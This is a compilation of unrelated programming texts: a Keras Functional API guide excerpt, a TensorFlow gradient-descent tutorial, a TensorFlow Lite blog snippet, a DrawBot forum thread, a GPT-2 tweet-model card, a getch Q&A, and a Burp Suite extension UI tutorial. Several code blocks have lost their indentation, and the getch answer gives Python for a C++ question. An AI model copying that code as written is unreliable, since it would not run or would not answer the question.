title_features = layers.LSTM(128)(title_features)
# Reduce the sequence of embedded words in the body into a single 32-dimensional vector
body_features = layers.LSTM(32)(body_features)
# Merge all available features into a single large vector via concatenation
x = layers.concatenate([title_features, body_features, tags_input])
# Stick a logistic regression for priority prediction on top of the features
priority_pred = layers.Dense(1, activation='sigmoid', name='priority')(x)
# Stick a department classifier on top of the features
department_pred = layers.Dense(num_departments, activation='softmax', name='department')(x)
# Instantiate an end-to-end model predicting both priority and department
model = keras.Model(inputs=[title_input, body_input, tags_input],
                    outputs=[priority_pred, department_pred])
Plotting the model:
keras.utils.plot_model(model, 'multi_input_and_output_model.png', show_shapes=True)
When compiling this model, we can assign different losses to each output. You can even assign different weights to each loss, to modulate its contribution to the total training loss.
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss=['binary_crossentropy', 'categorical_crossentropy'],
loss_weights=[1., 0.2])
Since we gave names to our output layers, we could also specify the losses like this:
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss={'priority': 'binary_crossentropy',
'department': 'categorical_crossentropy'},
loss_weights=[1., 0.2])
We can train the model by passing lists of NumPy arrays of inputs and targets:
import numpy as np
# Dummy input data
title_data = np.random.randint(num_words, size=(1280, 10))
body_data = np.random.randint(num_words, size=(1280, 100))
tags_data = np.random.randint(2, size=(1280, num_tags)).astype('float32')
# Dummy target data
priority_targets = np.random.random(size=(1280, 1))
dept_targets = np.random.randint(2, size=(1280, num_departments))
model.fit({'title': title_data, 'body': body_data, 'tags': tags_data},
{'priority': priority_targets, 'department': dept_targets},
epochs=2,
batch_size=32)
Epoch 1/2 40/40 [==============================] - 0s 12ms/step - loss: 1.3044 - priority_loss: 0.7146 - department_loss: 2.9490 Epoch 2/2 40/40 [==============================] - 0s 11ms/step - loss: 1.2906 - priority_loss: 0.6993 - department_loss: 2.9562 <tensorflow.python.keras.callbacks.History at 0x7fb48ae72f60>
When calling fit with a Dataset object, it should yield either a tuple of lists like ([title_data, body_data, tags_data], [priority_targets, dept_targets]) or a tuple of dicts like ({'title': title_data, 'body': body_data, 'tags': tags_data}, {'priority': priority_targets, 'department': dept_targets}).
For a more detailed explanation, see the complete Training and Evaluation guide.
A toy residual network model
Besides models with multiple inputs and outputs, the Functional API makes it easy to manipulate non-linear connectivity topologies, that is, models where layers are not connected sequentially. This also cannot be handled with the Sequential API (as its name indicates).
A common use case for this is residual connections.
Let's build a toy ResNet model for CIFAR10 to demonstrate this.
inputs = keras.Input(shape=(32, 32, 3), name='img')
x = layers.Conv2D(32, 3, activation='relu')(inputs)
x = layers.Conv2D(64, 3, activation='relu')(x)
block_1_output = layers.MaxPooling2D(3)(x)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_1_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_2_output = layers.add([x, block_1_output])
x = layers.Conv2D(64, 3, activation='relu', padding='same')(block_2_output)
x = layers.Conv2D(64, 3, activation='relu', padding='same')(x)
block_3_output = layers.add([x, block_2_output])
x = layers.Conv2D(64, 3, activation='relu')(block_3_output)
x = layers.GlobalAveragePooling2D()(x)
x = layers.Dense(256, activation='relu')(x)
x = layers.Dropout(0.5)(x)
outputs = layers.Dense(10, activation='softmax')(x)
model = keras.Model(inputs, outputs, name='toy_resnet')
model.summary()
Model: "toy_resnet" __________________________________________________________________________________________________ Layer (type) Output Shape Param # Connected to ================================================================================================== img (InputLayer) [(None, 32, 32, 3)] 0 __________________________________________________________________________________________________ conv2d_8 (Conv2D) (None, 30, 30, 32) 896 img[0][0] __________________________________________________________________________________________________ conv2d_9 (Conv2D) (None, 28, 28, 64) 18496 conv2d_8[0][0] __________________________________________________________________________________________________ max_pooling2d_2 (MaxPooling2D) (None, 9, 9, 64) 0 conv2d_9[0][0] __________________________________________________________________________________________________ conv2d_10 (Conv2D) (None, 9, 9, 64) 36928 max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_11 (Conv2D) (None, 9, 9, 64) 36928 conv2d_10[0][0] __________________________________________________________________________________________________ add (Add) (None, 9, 9, 64) 0 conv2d_11[0][0] max_pooling2d_2[0][0] __________________________________________________________________________________________________ conv2d_12 (Conv2D) (None, 9, 9, 64) 36928 add[0][0] __________________________________________________________________________________________________ conv2d_13 (Conv2D) (None, 9, 9, 64) 36928 conv2d_12[0][0] __________________________________________________________________________________________________ add_1 (Add) (None, 9, 9, 64) 0 conv2d_13[0][0] add[0][0] __________________________________________________________________________________________________ conv2d_14 (Conv2D) (None, 7, 7, 64) 36928 add_1[0][0] __________________________________________________________________________________________________ global_average_pooling2d (Globa (None, 64) 0 conv2d_14[0][0] __________________________________________________________________________________________________ dense_9 (Dense) (None, 256) 16640 global_average_pooling2d[0][0] __________________________________________________________________________________________________ dropout (Dropout) (None, 256) 0 dense_9[0][0] __________________________________________________________________________________________________ dense_10 (Dense) (None, 10) 2570 dropout[0][0] ================================================================================================== Total params: 223,242 Trainable params: 223,242 Non-trainable params: 0 __________________________________________________________________________________________________
Plotting the model:
keras.utils.plot_model(model, 'mini_resnet.png', show_shapes=True)
Let's train it:
(x_train, y_train), (x_test, y_test) = keras.datasets.cifar10.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
model.compile(optimizer=keras.optimizers.RMSprop(1e-3),
loss='categorical_crossentropy',
metrics=['acc'])
model.fit(x_train, y_train,
batch_size=64,
epochs=1,
validation_split=0.2)
Downloading data from https://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz 170500096/170498071 [==============================] - 2s 0us/step 625/625 [==============================] - 4s 6ms/step - loss: 1.8840 - acc: 0.2842 - val_loss: 1.5108 - val_acc: 0.4309 <tensorflow.python.keras.callbacks.History at 0x7fb48a701f28>
Sharing layers
Another good use for the Functional API is models that use shared layers. Shared layers are layer instances that are reused multiple times in the same model: they learn features that correspond to multiple paths in the graph of layers.
Shared layers are often used to encode inputs that come from similar spaces (say, two different pieces of text that feature similar vocabulary), since they enable sharing of information across these different inputs and make it possible to train such a model on less data. If a given word is seen in one of the inputs, that will benefit the processing of all inputs that pass through the shared layer.
To share a layer in the Functional API, just call the same layer instance multiple times. For instance, here's an Embedding layer shared across two different text inputs:
# Embedding for 1000 unique words mapped to 128-dimensional vectors
shared_embedding = layers.Embedding(1000, 128)
# Variable-length sequence of integers
text_input_a = keras.Input(shape=(None,), dtype='int32')
# Variable-length sequence of integers
text_input_b = keras.Input(shape=(None,), dtype='int32')
# We reuse the same layer to encode both inputs
encoded_input_a = shared_embedding(text_input_a)
encoded_input_b = shared_embedding(text_input_b)
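From here you could, for instance, pool each encoded sequence and train a small classifier on top of both inputs; a minimal sketch (the pooling and Dense head are illustrative choices, not part of the original guide):
pooled_a = layers.GlobalAveragePooling1D()(encoded_input_a)
pooled_b = layers.GlobalAveragePooling1D()(encoded_input_b)
merged = layers.concatenate([pooled_a, pooled_b])
outputs = layers.Dense(1, activation='sigmoid')(merged)
shared_model = keras.Model([text_input_a, text_input_b], outputs)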
Extracting and reusing nodes in the graph of layers
Because the graph of layers you are manipulating in the Functional API is a static data structure, it can be accessed and inspected. This is how we are able to plot Functional models as images, for instance.
This also means that we can access the activations of intermediate layers ("nodes" in the graph) and reuse them elsewhere. This is extremely useful for feature extraction, for example!
Let's look at an example. This is a VGG19 model with weights pre-trained on ImageNet:
from tensorflow.keras.applications import VGG19
vgg19 = VGG19()
Downloading data from https://storage.googleapis.com/tensorflow/keras-applications/vgg19/vgg19_weights_tf_dim_ordering_tf_kernels.h5 574717952/574710816 [==============================] - 2s 0us/step
And these are the intermediate activations of the model, obtained by querying the graph data structure:
features_list = [layer.output for layer in vgg19.layers]
We can use these features to create a new feature-extraction model that returns the values of the intermediate layer activations, and we can do all of this in 3 lines:
feat_extraction_model = keras.Model(inputs=vgg19.input, outputs=features_list)
img = np.random.random((1, 224, 224, 3)).astype('float32')
extracted_features = feat_extraction_model(img)
This comes in handy when implementing neural style transfer, among other things.
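For style transfer you typically want a handful of specific layers rather than all of them; since the graph is inspectable, you can also grab a single layer by name (block4_pool is one of VGG19's standard layer names):
block4_pool_features = keras.Model(inputs=vgg19.input,
                                   outputs=vgg19.get_layer('block4_pool').output)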
Extending the API by writing custom layers
tf.keras has a wide range of built-in layers. Here are a few examples:
Convolutional layers: Conv1D, Conv2D, Conv3D, Conv2DTranspose, etc.
Pooling layers: MaxPooling1D, MaxPooling2D, MaxPooling3D, AveragePooling1D, etc.
RNN layers: GRU, LSTM, ConvLSTM2D, etc.
BatchNormalization, Dropout, Embedding, etc.
If you don't find what you need, it's easy to extend the API by creating your own layers.
All layers subclass the Layer class and implement:
A call method, which specifies the computation done by the layer
A build method, which creates the layer's weights (note that this is just a style convention; you could create weights in __init__ as well)
To learn more about creating layers from scratch, see the Writing Layers and Models from Scratch guide.
Here's a simple implementation of a Dense layer:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
If you want your custom layer to support serialization, you should also define a get_config method that returns the constructor arguments of the layer instance:
class CustomDense(layers.Layer):
def __init__(self, units=32):
super(CustomDense, self).__init__()
self.units = units
def build(self, input_shape):
self.w = self.add_weight(shape=(input_shape[-1], self.units),
initializer='random_normal',
trainable=True)
self.b = self.add_weight(shape=(self.units,),
initializer='random_normal',
trainable=True)
def call(self, inputs):
return tf.matmul(inputs, self.w) + self.b
def get_config(self):
return {'units': self.units}
inputs = keras.Input((4,))
outputs = CustomDense(10)(inputs)
model = keras.Model(inputs, outputs)
config = model.get_config()
new_model = keras.Model.from_config(
config, custom_objects={'CustomDense': CustomDense})
Optionally, you could also implement the class method from_config(cls, config), which is in charge of recreating a layer instance given its config dictionary. The default implementation of from_config is:
def from_config(cls, config):
return cls(**config)
When to use the Functional API
How do you decide whether to use the Functional API to create a new model, or just subclass the Model class directly?
In general, the Functional API is higher-level, easier and safer to use, and has a number of features that subclassed models do not support.
However, model subclassing gives you greater flexibility when building models that are not easily expressible as directed acyclic graphs of layers (for instance, you could not implement a Tree-RNN with the Functional API; you would have to subclass Model directly).
Here are the strengths of the Functional API:
The properties listed below are also all true for Sequential models (which are also data structures), but they are not true for subclassed models (which are Python bytecode, not data structures).
It is less verbose.
No super(MyClass, self).__init__(...), no def call(self, ...):, etc.
Compare:
inputs = keras.Input(shape=(32,))
x = layers.Dense(64, activation='relu')(inputs)
outputs = layers.Dense(10)(x)
mlp = keras.Model(inputs, outputs)
With the subclassed version:
class MLP(keras.Model):

    def __init__(self, **kwargs):
        super(MLP, self).__init__(**kwargs)
        self.dense_1 = layers.Dense(64, activation='relu')
        self.dense_2 = layers.Dense(10)

    def call(self, inputs):
        x = self.dense_1(inputs)
        return self.dense_2(x)

# Instantiate the model.
mlp = MLP()
# Necessary to create the model's state.
# The model doesn't have a state until it's called at least once.
_ = mlp(tf.zeros((1, 32)))
It validates your model while you're defining it.
In the Functional API, your input specification (shape and dtype) is created in advance (via Input), and every time you call a layer, the layer checks that the specification passed to it matches its assumptions, and it will raise a helpful error message if not.
This guarantees that any model you can build with the Functional API will run. All debugging (other than convergence-related debugging) happens statically during model construction, and not at execution time. This is similar to type checking in a compiler.
Your Functional model is plottable and inspectable.
You can plot the model as a graph, and you can easily access intermediate nodes in this graph, for instance to extract and reuse the activations of intermediate layers, as we saw in an earlier example:
features_list = [layer.output for layer in vgg19.layers]
feat_extraction_model = keras.Model(inputs=vgg19.input, outputs=features_list)
Your Functional model can be serialized or cloned.
Because a Functional model is a data structure rather than a piece of code, it is safely serializable and can be saved as a single file that allows you to recreate the exact same model without having access to any of the original code. See our saving and serialization guide for more details.
Here are the weaknesses of the Functional API:
It does not support dynamic architectures.
The Functional API treats models as DAGs of layers. This is true for most deep learning architectures, but not all: for instance, recursive networks or Tree RNNs do not follow this assumption and cannot be implemented in the Functional API.
Sometimes, you just need to write everything from scratch.
When writing advanced architectures, you may want to do things that are outside the scope of "defining a DAG of layers": for instance, you may want to expose multiple custom training and inference methods on your model instance. This requires subclassing.
To dive deeper into the differences between the Functional API and model subclassing, you can read What are Symbolic and Imperative APIs in TensorFlow 2.0?.
Mixing and matching different API styles
Importantly, choosing between the Functional API and model subclassing is not a binary decision that restricts you to one category of models. All models in the tf.keras API can interact with each other, whether they are Sequential models, Functional models, or subclassed models/layers written from scratch.
You can always use a Functional or Sequential model as part of a subclassed model/layer:
units = 32
timesteps = 10
input_dim = 5
# Define a Functional model
inputs = keras.Input((None, units))
x = layers.GlobalAveragePooling1D()(inputs)
outputs = layers.Dense(1, activation='sigmoid')(x)
model = keras.Model(inputs, outputs)
class CustomRNN(layers.Layer):
def __init__(self):
super(CustomRNN, self).__init__()
self.units = units
self.projection_1 = layers.Dense(units=units, activation='tanh')
self.projection_2 = layers.Dense(units=units, activation='tanh')
# Our previously-defined Functional model
self.classifier = model
def call(self, inputs):
outputs = []
state = tf.zeros(shape=(inputs.shape[0], self.units))
for t in range(inputs.shape[1]):
x = inputs[:, t, :]
h = self.projection_1(x)
y = h + self.projection_2(state)
state = y
outputs.append(y)
features = tf.stack(outputs, axis=1)
print(features.shape)
return self.classifier(features)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, timesteps, input_dim)))
(1, 10, 32)
Conversely, you can use any subclassed Layer or Model in the Functional API, as long as it implements a call method that follows one of the following patterns:
call(self, inputs, **kwargs), where inputs is a tensor or a nested structure of tensors (e.g. a list of tensors), and where **kwargs are non-tensor (non-input) arguments.
call(self, inputs, training=None, **kwargs), where training is a boolean indicating whether the layer should behave in training mode or inference mode.
call(self, inputs, mask=None, **kwargs), where mask is a boolean mask tensor (useful for RNNs, for instance).
call(self, inputs, training=None, mask=None, **kwargs): of course, you can have both masking-specific and training-specific behavior at the same time.
Additionally, if you implement the get_config method on your custom Layer or Model, the Functional models you create with it will still be serializable and clonable.
Here's a quick example where we use a custom RNN written from scratch in a Functional model:
units = 32
timesteps = 10
input_dim = 5
batch_size = 16
class CustomRNN(layers.Layer):
def __init__(self):
super(CustomRNN, self).__init__()
self.units = units
self.projection_1 = layers.Dense(units=units, activation='tanh')
self.projection_2 = layers.Dense(units=units, activation='tanh')
self.classifier = layers.Dense(1, activation='sigmoid')
def call(self, inputs):
outputs = []
state = tf.zeros(shape=(inputs.shape[0], self.units))
for t in range(inputs.shape[1]):
x = inputs[:, t, :]
h = self.projection_1(x)
y = h + self.projection_2(state)
state = y
outputs.append(y)
features = tf.stack(outputs, axis=1)
return self.classifier(features)
# Note that we specify a static batch size for the inputs via the `batch_shape`
# arg, because the inner computation of `CustomRNN` requires a static batch size
# (when we create the `state` zeros tensor).
inputs = keras.Input(batch_shape=(batch_size, timesteps, input_dim))
x = layers.Conv1D(32, 3)(inputs)
outputs = CustomRNN()(x)
model = keras.Model(inputs, outputs)
rnn_model = CustomRNN()
_ = rnn_model(tf.zeros((1, 10, 5)))
This concludes our guide on the Keras Functional API!
You now have at your fingertips a powerful set of tools for building deep learning models.
|
2020/01/13
The theory part runs long because I don't know how to use an equation-rendering plugin, so I had no choice but to include the formulas as photos…
To simplify the explanation, let's look at a reduced form of the hypothesis.
Take the bias b to be 0, treat the cost function as a function of W, and suppose we have data like the table below.
Plugging this data into the cost function, we can derive results like the following.
When W is 2 we likewise get a value of about 4.67. Substituting various values this way and computing the cost, our hypothesis H(x) = Wx, for data like the table above, produces the cost distribution below when plotted with cost on the y-axis and W on the x-axis.
We can see intuitively that the W value where the cost is minimized is 1. But what if we want to find it mechanically, rather than by eye?
Translated literally, it is an algorithm that "descends along the gradient."
Characteristics
It changes the values of W and b little by little.
To explain the gradient we'll bring in the concept of the derivative; before applying it, let's first write down the update formula for the slope.
Think of it as taking a very small step by subtracting from W the derivative of the cost: W := W - α * ∂cost(W)/∂W (here α is the learning rate).
Running this algorithm repeatedly keeps updating W until it converges to the cost-minimizing value we looked at earlier.
The formula marked with the blue box below is the final gradient descent algorithm. Apply it mechanically and you can find the W that minimizes the cost function; that is the learning process at the heart of linear regression, the process that produces the model.
With a cost function whose graph looks like the figure above, the algorithm we've described so far does not work properly, because starting from different points and following the slope can land you at different minima.
Fortunately, when we plot a graph from our hypothesis and cost function we get one like the figure above, called a convex function. In that case, wherever you start, you arrive at the point we want, and our gradient descent algorithm is guaranteed to find the answer.
When designing a cost function, it is very important to check that its shape is convex.
import tensorflow as tf
import matplotlib.pyplot as plt

X = [1, 2, 3]
Y = [1, 2, 3]

W = tf.placeholder(tf.float32)

# Our hypothesis for linear model X * W
hypothesis = X * W

# cost/loss function
cost = tf.reduce_mean(tf.square(hypothesis - Y))

# Launch the graph in a session.
sess = tf.Session()
# Initialize global variables in the graph.
sess.run(tf.global_variables_initializer())

# Variables for plotting cost function
W_val = []
cost_val = []
for i in range(-30, 50):
    feed_W = i * 0.1
    curr_cost, curr_W = sess.run([cost, W], feed_dict={W: feed_W})
    W_val.append(curr_W)
    cost_val.append(curr_cost)

# Show the cost function
plt.plot(W_val, cost_val)
plt.show()
The code above plots the cost function of our hypothesis H(x) = W * X for the given data X and Y: it varies W from -3 to 5 in steps of 0.1, stores the current cost and W values in lists, and visualizes the curve they trace (the matplotlib library does the plotting).
The result displayed by plt.show() is shown below.
Now it's time to apply gradient descent, which is explained next.
As we learned in the theory section, the descent algorithm works by adjusting the current W value, subtracting the derivative of the cost function at that point (the slope of the graph), thereby sliding down the surface of the graph (when the slope is negative, W moves in the increasing direction).
Implementing this in TensorFlow is just a matter of transcribing the formula:
learning_rate = 0.1
gradient = tf.reduce_mean((W * X - Y) * X)  # the derivative (slope) of the cost
descent = W - learning_rate * gradient
update = W.assign(descent)  # obtain (assign) the new W; plain = cannot be used to assign
The full code looks like this:
import tensorflow as tf

x_data = [1, 2, 3]
y_data = [1, 2, 3]

W = tf.Variable(tf.random_normal([1]), name='weight')
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)

# Our hypothesis for linear model X * W
hypothesis = X * W

# cost/loss function
cost = tf.reduce_sum(tf.square(hypothesis - Y))

# Minimize: Gradient Descent using derivative: W -= learning rate * derivative
learning_rate = 0.1
gradient = tf.reduce_mean((W * X - Y) * X)
descent = W - learning_rate * gradient
update = W.assign(descent)

# Launch the graph in a session.
sess = tf.Session()
# Initialize global variables in the graph.
sess.run(tf.global_variables_initializer())

for step in range(21):
    sess.run(update, feed_dict={X: x_data, Y: y_data})
    print(step, sess.run(cost, feed_dict={X: x_data, Y: y_data}), sess.run(W))
The result of this code is shown below.
Each line printed shows step, cost, and W, in that order; even with the update implemented by hand, it works very well.
To practice the principle of gradient descent we differentiated by hand, which was easy because our cost function was simple; in general the derivative can get very complicated, so writing it out manually every time you use TensorFlow would be painful.
If you write the code as below, TensorFlow does that work for you automatically:
# Minimize: Gradient Descent Magic
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)
train = optimizer.minimize(cost)
Even when W = tf.Variable(tf.random_normal([1]), name='weight') in the full code above is replaced with a value far from the optimum, such as 5.0 or -3.0, the code still converges to the correct result.
If you want to tweak the gradient values that TensorFlow computes, you can try logic like the following.
import tensorflow as tf

x_data = [1, 2, 3]
y_data = [1, 2, 3]

# Set wrong model weights
W = tf.Variable(5.)
# Input placeholders
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)

# Our hypothesis for linear model X * W
hypothesis = X * W

# Manual gradient
gradient = tf.reduce_mean((W * X - Y) * X) * 2

# cost/loss function
cost = tf.reduce_mean(tf.square(hypothesis - Y))

optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01)

# Get gradients
gvs = optimizer.compute_gradients(cost)
# Apply gradients
apply_gradients = optimizer.apply_gradients(gvs)

# Launch the graph in a session.
sess = tf.Session()
sess.run(tf.global_variables_initializer())

for step in range(100):
    print(step, sess.run([gradient, W, gvs], feed_dict={X: x_data, Y: y_data}))
    sess.run(apply_gradients, feed_dict={X: x_data, Y: y_data})
The code above is an experiment to see whether the gradient written out by hand differs from the gradient the optimizer computes while minimizing.
compute_gradients is said to let you manipulate the gradients; here the values are passed through unmodified, for the comparison.
The result is as follows.
The hand-written gradient, the gradient the optimizer produces, and the W computed from them are the same values, apart from tiny floating-point precision differences.
In case the relationship between the output and the print statement is confusing: the statement is print(step, sess.run([gradient, W, gvs])), so comparing with the first line of output, 0 is the step, 37.333332 is the gradient, 5.0 is W, and the two elements of the trailing array are the gradient and W from compute_gradients.
|
April 14, 2020 — Posted by Khanh LeViet, Developer Advocate
TensorFlow Lite is the official framework for running inference with TensorFlow models on edge devices. TensorFlow Lite is deployed on more than 4 billion edge devices worldwide, supporting Android, iOS, Linux-based IoT devices, and microcontrollers.
Since its first launch in late 2017, we have been improving TensorFlow Lite to make it robust while keeping it easy…
Benchmark on Pixel 4 CPU, 4 Threads, March 2020
Model hyper parameters: Sequence length 128, Vocab size 30K
data = ImageClassifierDataLoader.from_folder('flower_photos/')
model = image_classifier.create(data)
loss, accuracy = model.evaluate()
model.export('flower_classifier.tflite', 'flower_label.txt', with_metadata=True)
Model Maker supports many state-of-the-art models that are available on TensorFlow Hub, including the EfficientNet-Lite models. If you want to get higher accuracy, you can switch to a different model architecture by changing just one line of code while keeping the rest of your training pipeline.
# EfficientNet-Lite2.
model = image_classifier.create(data, efficientnet_lite2_spec)
# ResNet 50.
model = image_classifier.create(data, resnet_50_spec)
Model Maker currently supports two use cases: image classification (tutorial) and text classification (tutorial), with more computer vision and NLP use cases coming soon.
# Creates model info.
model_meta = _metadata_fb.ModelMetadataT()
model_meta.name = "MobileNetV1 image classifier"
model_meta.description = ("Identify the most prominent object in the "
"image from a set of 1,001 categories such as "
"trees, animals, food, vehicles, person etc.")
model_meta.version = "v1"
model_meta.author = "TensorFlow"
model_meta.license = ("Apache License. Version 2.0 "
"http://www.apache.org/licenses/LICENSE-2.0.")
# Describe input and output tensors
# ...
# Writing the metadata to your model
b = flatbuffers.Builder(0)
b.Finish(
model_meta.Pack(b),
_metadata.MetadataPopulator.METADATA_FILE_IDENTIFIER)
metadata_buf = b.Output()
populator = _metadata.MetadataPopulator.with_model_file(model_file)
populator.load_metadata_buffer(metadata_buf)
populator.load_associated_files(["your_path_to_label_file"])
populator.populate()
For a complete example of how we populate the metadata for MobileNet v1, please refer to this guide.
Pixel 4 - Single Threaded CPU, February 2020
|
Grid
eduairetlast edited by gferreira
Hi everyone, I've been learning to use DrawBot; I'm trying to make a grid. I've figured out the following code, but I have problems with a guide at the end of the canvas on both the x and y sides. Does anybody know how I can fix it? Thank you very much.
#We're going to create the canvas
def canvas(w, h):
newPage(w, h)
fill(1)
rect(0, 0, w, h)
canvas(1000, 1000)
#Defining the grid
rows = 1
cols = 1
strokeWidth(2)
stroke(0,1,1)
def vGuide (cols, gutter):
for currentCol in range(cols):
pos = width()/(cols)
x = width()/(cols) + currentCol*pos
y = 0
print(pos)
line((x-(gutter/2), y),(x-(gutter/2), height()))
line((x+(gutter/2), y),(x+(gutter/2), height()))
def hGuide (rows, gutter):
for currentRow in range(rows):
pos = width()/(rows)
x = 0
y = width()/(rows) + currentRow*pos
print(pos)
line((x, y-(gutter/2)),(width(), y-(gutter/2)))
line((x, y+(gutter/2)),(width(), y+(gutter/2)))
#Execute
vGuide(4, 12)
hGuide(4, 12)
gferreiralast edited by
hello @eduairet,
the number of spaces between columns is the number of columns + 1. so:
def vGuide(cols, gutter):
for currentCol in range(cols+1):
x = width() / cols * currentCol
# ...
def hGuide(rows, gutter):
for currentRow in range(rows+1):
y = height() / rows * currentRow
# ...
you can also loop over the actual rows and columns to create a grid using rectangles:
size(1000, 700)
cols = 4
rows = 3
gutter = 12
w = (width() - gutter * (cols + 1)) / cols
h = (height() - gutter * (rows + 1)) / rows
fill(None)
strokeWidth(2)
stroke(0, 1, 1)
for col in range(cols):
for row in range(rows):
x = gutter + col * (w + gutter)
y = gutter + row * (h + gutter)
rect(x, y, w, h)
cheers!
eduairetlast edited by eduairet
w = (width() - gutter * (cols + 1)) / cols
h = (height() - gutter * (rows + 1)) / rows
Thank you very much, it worked much better. I also tried to add a margin feature, which worked well, so now I can design over the grid:
size(1000, 1000)
cols = 3
rows = 3
gutter = 12
#Margin
mTop = 10 - gutter
mBottom = 20 - gutter
mLeft = 10 - gutter
mRight = 10 - gutter
w = (width() - gutter * (cols + 1)) / cols - ((mRight + mLeft) / cols)
h = (height() - gutter * (rows + 1)) / rows - ((mTop + mBottom) / rows)
fill(None)
strokeWidth(1)
stroke(0, 1, 1)
for col in range(cols):
for row in range(rows):
x = gutter + col * (w + gutter)
y = gutter + row * (h + gutter)
rect(x + mLeft, y + mBottom, w, h)
|
I was made with huggingtweets.
Create your own bot based on your favorite user with the demo!
How does it work?
The model uses the following pipeline.
To understand how the model was developed, check the W&B report.
Training data
The model was trained on @matteosalvinimi's tweets.
Data Quantity
Tweets downloaded: 3247
Retweets: 16
Short tweets: 62
Tweets kept: 3169
Training procedure
The model is based on a pre-trained GPT-2 which is fine-tuned on @matteosalvinimi's tweets.
Hyperparameters and metrics are recorded in the W&B training run for full transparency and reproducibility.
At the end of training, the final model is logged and versioned.
Intended uses & limitations
How to use
You can use this model directly with a pipeline for text generation:
from transformers import pipeline
generator = pipeline('text-generation',
model='huggingtweets/matteosalvinimi')
generator("My dream is", num_return_sequences=5)
Limitations and bias
The model suffers from the same limitations and bias as GPT-2.
In addition, the data present in the user's tweets further affects the text generated by the model.
About
Built by Boris Dayma
Downloads last month
0
|
How do I implement a function like getch() in C++? Or maybe there are libraries for this? I need the program to wait for a single keypress of any character.
You can do it roughly like this:
#!/usr/bin/env python3
# CursesExample1
#-------------------------------
# Curses Programming Sample 1
#-------------------------------
import curses
myscreen = curses.initscr()
myscreen.border(0)
myscreen.addstr(12, 25, "See Curses, See Curses Run!")
myscreen.refresh()
myscreen.getch()
curses.endwin()
More details can be found here.
Update:
And if you are on Windows, it's even simpler:
import sys
import msvcrt

while True:
    pressedKey = msvcrt.getch()   # returns a bytes object on Python 3
    if pressedKey == b'q':
        print("Q was pressed")
    elif pressedKey == b'x':
        sys.exit()
    else:
        print("Key pressed: " + str(pressedKey))
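On Linux/macOS you can also get a single keypress without curses, using the standard termios and tty modules (a minimal sketch):

import sys
import termios
import tty

def getch():
    fd = sys.stdin.fileno()
    old = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)  # raw mode: read() returns after a single keypress
        return sys.stdin.read(1)
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, old)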
|
To add a custom tab, the interface to implement is ITab; the tab is registered by calling addSuiteTab.
This interface is used to provide Burp with details of a custom tab that will be added to Burp’s UI, using a method such as IBurpExtenderCallbacks.addSuiteTab().
The following two methods must be implemented so that Burp can display the tab's contents:
Modifier and Type Method and Description
java.lang.String getTabCaption()
Burp uses this method to obtain the caption that should appear on the custom tab when it is displayed.
java.awt.Component getUiComponent()
Burp uses this method to obtain the component that should be used as the contents of the custom tab when it is displayed.
Rough usage looks like this:
# Sets the tab's display name
def getTabCaption(self):
    return "RSA Plugin"

# Returns the UI shown when the tab is clicked; self.tab is our custom UI tree
def getUiComponent(self):
    return self.tab
In addition, the component used in getUiComponent can be passed through the IBurpExtenderCallbacks.customizeUiComponent method.
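Putting the pieces together, a minimal Jython skeleton for registering the tab might look like this (the JPanel placeholder for self.tab is an assumption; a real plugin would build its UI there):

from burp import IBurpExtender, ITab
from javax import swing

class BurpExtender(IBurpExtender, ITab):
    def registerExtenderCallbacks(self, callbacks):
        self._callbacks = callbacks
        self.tab = swing.JPanel()  # custom UI root goes here
        callbacks.customizeUiComponent(self.tab)
        callbacks.addSuiteTab(self)  # Burp will now call the two methods below

    def getTabCaption(self):
        return "RSA Plugin"

    def getUiComponent(self):
        return self.tab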
For the right-click context menu, the interface is IContextMenuFactory; per the documentation, you register the custom menu via registerContextMenuFactory.
Extensions can implement this interface and then call IBurpExtenderCallbacks.registerContextMenuFactory() to register a factory for custom context menu items.
The method to override when building a custom menu is shown below; you can inspect invocation to determine which view triggered it and build the menu dynamically.
Modifier and Type Method and Description
java.util.List<javax.swing.JMenuItem> createMenuItems(IContextMenuInvocation invocation)
This method will be called by Burp when the user invokes a context menu anywhere within Burp.
Here both encryption and decryption get extra request/response entries, letting the user choose where the request comes from.
Update: you can call getToolFlag to learn which tool the menu was invoked from, and getInvocationContext to get the invocation context.
def createMenuItems(self, invocation):
    self._invocation = invocation
    self._messages_index = self._invocation.getSelectionBounds()
    self._messages = self._invocation.getSelectedMessages()
    self._servicetype = self._invocation.getInvocationContext() % 2
    top_menu = swing.JMenu(self._title)
    for _item in self.typeString:
        top_menu.add(swing.JMenuItem(_item, actionPerformed=lambda x: self.evenHandler(x)))
    return [top_menu]
The relevant InvocationContext values are mainly the ones marked in bold; a simple mod 2 determines whether the selected text comes from a request or a response.
Constant Field Value
CONTEXT_INTRUDER_ATTACK_RESULTS 9
CONTEXT_INTRUDER_PAYLOAD_POSITIONS 8
CONTEXT_MESSAGE_EDITOR_REQUEST 0
CONTEXT_MESSAGE_EDITOR_RESPONSE 1
CONTEXT_MESSAGE_VIEWER_REQUEST 2
CONTEXT_MESSAGE_VIEWER_RESPONSE 3
CONTEXT_PROXY_HISTORY 6
What is needed depends on where it is used; here the goal was a quick right-click replace similar to Decoder. The interface involved is IContextMenuInvocation, and its two main methods are the following:
Modifier and Type Method and Description
